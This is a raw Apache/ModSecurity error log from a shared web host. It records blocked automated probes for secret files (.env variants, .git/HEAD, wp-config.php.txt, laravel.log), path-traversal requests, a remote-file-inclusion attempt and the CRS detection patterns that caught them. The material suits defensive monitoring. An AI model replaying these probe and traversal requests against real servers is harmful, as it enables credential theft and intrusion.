[Tue May 12 02:46:38.316162 2026] [ssl:error] [pid 1730207:tid 1730217] AH01941: stapling_renew_response: responder error
[Tue May 12 02:46:38.577377 2026] [security2:error] [pid 1691274:tid 1691286] [client 2.58.56.215:51769] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env"] [unique_id "agJ4blfdQaraX_prmqcffQAAAAk"]
[Tue May 12 02:46:38.577578 2026] [security2:error] [pid 1691274:tid 1691286] [client 2.58.56.215:51769] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env"] [unique_id "agJ4blfdQaraX_prmqcffQAAAAk"]
[Tue May 12 02:46:38.577798 2026] [security2:error] [pid 1691274:tid 1691286] [client 2.58.56.215:51769] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env"] [unique_id "agJ4blfdQaraX_prmqcffQAAAAk"]
[Tue May 12 02:46:38.758983 2026] [ssl:error] [pid 1730175:tid 1730200] (EAI 2)Name or service not known: [client 46.105.40.140:16449] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 02:46:38.759017 2026] [ssl:error] [pid 1730175:tid 1730200] AH01941: stapling_renew_response: responder error
[Tue May 12 02:46:43.676503 2026] [:error] [pid 1730175:tid 1730183] [client 140.213.9.42:31305] File does not exist: /home/piregwan/public_html/wp-login.php
[Tue May 12 02:46:56.231165 2026] [security2:error] [pid 1691274:tid 1691291] [client 34.203.111.15:65401] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://212.68.200.99 found within ARGS:url: http://212.68.200.99:9673/mseal/stx/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ4gFfdQaraX_prmqcfjQAAAA8"]
[Tue May 12 02:46:56.231674 2026] [security2:error] [pid 1691274:tid 1691291] [client 34.203.111.15:65401] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ4gFfdQaraX_prmqcfjQAAAA8"]
[Tue May 12 02:46:56.231924 2026] [security2:error] [pid 1691274:tid 1691291] [client 34.203.111.15:65401] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ4gFfdQaraX_prmqcfjQAAAA8"]
[Tue May 12 02:47:05.892802 2026] [security2:error] [pid 1730175:tid 1730194] [client 43.133.91.48:37090] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/tarifs/"] [unique_id "agJ4iXo6NvB9WXx5V-56aAAAARE"]
[Tue May 12 02:47:14.792817 2026] [security2:error] [pid 1730175:tid 1730195] [client 98.83.72.38:49353] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/freelivesexonline.com"] [unique_id "agJ4kno6NvB9WXx5V-56dAAAARI"]
[Tue May 12 02:47:14.793185 2026] [security2:error] [pid 1730175:tid 1730195] [client 98.83.72.38:49353] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/freelivesexonline.com"] [unique_id "agJ4kno6NvB9WXx5V-56dAAAARI"]
[Tue May 12 02:47:14.793413 2026] [security2:error] [pid 1730175:tid 1730195] [client 98.83.72.38:49353] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/freelivesexonline.com"] [unique_id "agJ4kno6NvB9WXx5V-56dAAAARI"]
PHP Warning:  filesize(): stat failed for /proc/1704909/task/1704917/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704909/task/1704917/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704909/task/1704917/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704909/task/1704917/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704909/task/1704917/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704909/task/1704917/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:48:20.101467 2026] [security2:error] [pid 1707624:tid 1707686] [client 43.166.255.102:36458] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/nous-contacter/"] [unique_id "agJ41LOxS7i6i_mT2NLIxAAAAEQ"]
[Tue May 12 02:48:24.257929 2026] [security2:error] [pid 1730175:tid 1730199] [client 43.156.117.41:42562] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "mail.piregwan-genesis.com"] [uri "/"] [unique_id "agJ42Ho6NvB9WXx5V-56mwAAARY"], referer: http://mail.piregwan-genesis.com
[Tue May 12 02:48:24.505002 2026] [security2:error] [pid 1695975:tid 1695983] [client 119.28.122.202:43638] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2019/11/Pour-un-cirque-extrait-1.mp3"] [unique_id "agJ42NVI9ymHBxup74-NCQAAAIU"]
[Tue May 12 02:48:36.519256 2026] [security2:error] [pid 1709071:tid 1709094] [client 43.163.206.70:60270] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.ixinabourgoin.fr"] [uri "/"] [unique_id "agJ45LvMumyrWMfSu7qqbgAAAMc"]
[Tue May 12 02:49:10.139191 2026] [autoindex:error] [pid 1709071:tid 1709093] [client 129.146.16.50:49157] AH01276: Cannot serve directory /home/giloursf/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:49:13.670938 2026] [autoindex:error] [pid 1709071:tid 1709093] [client 129.146.16.50:49157] AH01276: Cannot serve directory /home/giloursf/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:49:21.444898 2026] [security2:error] [pid 1695975:tid 1695994] [client 43.164.192.151:59614] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.k06.fr"] [uri "/"] [unique_id "agJ5EdVI9ymHBxup74-NOAAAAJA"]
[Tue May 12 02:49:55.428563 2026] [core:error] [pid 1707624:tid 1707701] [client 45.148.10.238:19504] AH10244: invalid URI path (/../.env)
[Tue May 12 02:49:55.428736 2026] [core:error] [pid 1730175:tid 1730187] [client 45.148.10.238:19602] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 02:49:55.429273 2026] [security2:error] [pid 1691274:tid 1691283] [client 45.148.10.238:19568] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env#"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env#"] [unique_id "agJ5M1fdQaraX_prmqcgCgAAAAY"]
[Tue May 12 02:49:55.429502 2026] [security2:error] [pid 1691274:tid 1691283] [client 45.148.10.238:19568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env#"] [unique_id "agJ5M1fdQaraX_prmqcgCgAAAAY"]
[Tue May 12 02:49:55.437683 2026] [core:error] [pid 1730175:tid 1730184] [client 45.148.10.238:19476] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 02:49:55.438602 2026] [security2:error] [pid 1695975:tid 1695999] [client 45.148.10.238:19550] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env"] [unique_id "agJ5M9VI9ymHBxup74-NWQAAAJU"]
[Tue May 12 02:49:55.438861 2026] [security2:error] [pid 1695975:tid 1695999] [client 45.148.10.238:19550] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env"] [unique_id "agJ5M9VI9ymHBxup74-NWQAAAJU"]
[Tue May 12 02:49:55.439768 2026] [security2:error] [pid 1691274:tid 1691290] [client 45.148.10.238:19530] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.git/index"] [unique_id "agJ5M1fdQaraX_prmqcgCwAAAA0"]
[Tue May 12 02:49:55.439817 2026] [security2:error] [pid 1691274:tid 1691294] [client 45.148.10.238:19462] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env.production.local"] [unique_id "agJ5M1fdQaraX_prmqcgDAAAABI"]
[Tue May 12 02:49:55.439942 2026] [security2:error] [pid 1691274:tid 1691290] [client 45.148.10.238:19530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.git/index"] [unique_id "agJ5M1fdQaraX_prmqcgCwAAAA0"]
[Tue May 12 02:49:55.439975 2026] [security2:error] [pid 1691274:tid 1691294] [client 45.148.10.238:19462] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env.production.local"] [unique_id "agJ5M1fdQaraX_prmqcgDAAAABI"]
[Tue May 12 02:49:55.440957 2026] [security2:error] [pid 1730207:tid 1730227] [client 45.148.10.238:19486] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "labaujue.com"] [uri "/storage/logs/laravel.log"] [unique_id "agJ5Mzue9Sp-pIv_Bb6RgQAAAVI"]
[Tue May 12 02:49:55.441239 2026] [security2:error] [pid 1730207:tid 1730227] [client 45.148.10.238:19486] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/storage/logs/laravel.log"] [unique_id "agJ5Mzue9Sp-pIv_Bb6RgQAAAVI"]
[Tue May 12 02:49:55.453466 2026] [security2:error] [pid 1730175:tid 1730201] [client 45.148.10.238:19540] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.git/HEAD"] [unique_id "agJ5M3o6NvB9WXx5V-57LgAAARg"]
[Tue May 12 02:49:55.453632 2026] [security2:error] [pid 1730175:tid 1730201] [client 45.148.10.238:19540] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.git/HEAD"] [unique_id "agJ5M3o6NvB9WXx5V-57LgAAARg"]
[Tue May 12 02:49:55.457854 2026] [security2:error] [pid 1707624:tid 1707688] [client 45.148.10.238:19488] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/wp-config.php.txt"] [unique_id "agJ5M7OxS7i6i_mT2NLJGwAAAEY"]
[Tue May 12 02:49:55.458034 2026] [security2:error] [pid 1707624:tid 1707688] [client 45.148.10.238:19488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/wp-config.php.txt"] [unique_id "agJ5M7OxS7i6i_mT2NLJGwAAAEY"]
[Tue May 12 02:49:55.461013 2026] [security2:error] [pid 1730207:tid 1730231] [client 45.148.10.238:19556] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env.txt"] [unique_id "agJ5Mzue9Sp-pIv_Bb6RgAAAAVY"]
[Tue May 12 02:49:55.461160 2026] [security2:error] [pid 1730207:tid 1730231] [client 45.148.10.238:19556] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "labaujue.com"] [uri "/.env.txt"] [unique_id "agJ5Mzue9Sp-pIv_Bb6RgAAAAVY"]
[Tue May 12 02:49:55.484638 2026] [security2:error] [pid 1709071:tid 1709105] [client 45.148.10.238:19490] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "labaujue.com"] [uri "/.env"] [unique_id "agJ5M7vMumyrWMfSu7qqugAAANI"]
